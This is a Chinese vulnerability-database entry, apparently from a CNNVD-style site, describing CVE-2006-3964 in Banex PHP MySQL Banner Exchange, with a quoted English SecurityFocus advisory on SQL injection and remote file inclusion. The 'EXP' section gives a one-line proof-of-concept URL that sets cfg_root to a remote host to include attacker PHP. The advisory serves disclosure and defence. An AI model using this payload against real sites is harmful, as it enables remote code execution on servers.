Banex PHP MySQL Banner Exchange 'members.php'多个远程漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110717 漏洞类型 输入验证
发布时间 2006-07-31 更新时间 2006-08-03
CVE编号 CVE-2006-3964 CNNVD-ID CNNVD-200608-010
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28308
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-010
|漏洞详情
BanexPHPMySQLBannerExchange2.21的members.php脚本存在PHP远程文件包含漏洞,远程攻击者可借助cfg_root参数中的URL执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/19240/info
  
PHP MySQL Banner Exchange is prone to multiple SQL-injection vulnerabilities and a remote file-include vulnerability because it fails to properly sanitize user-supplied input. 
  
An attacker can exploit the SQL-injection vulnerabilities to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
  
An attacker may also leverage the remote file-include issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process.
  
Version 2.1 of the application is affected by these vulnerabilities; other versions may also be affected.

http://www.example.com/members.php?cfg_root=http://www.example2.com/?
|参考资料

来源:BID
名称:19240
链接:http://www.securityfocus.com/bid/19240
来源:FULLDISC
名称:20060730BanexMultipleVulnerabilities
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m=115423462216111&w=2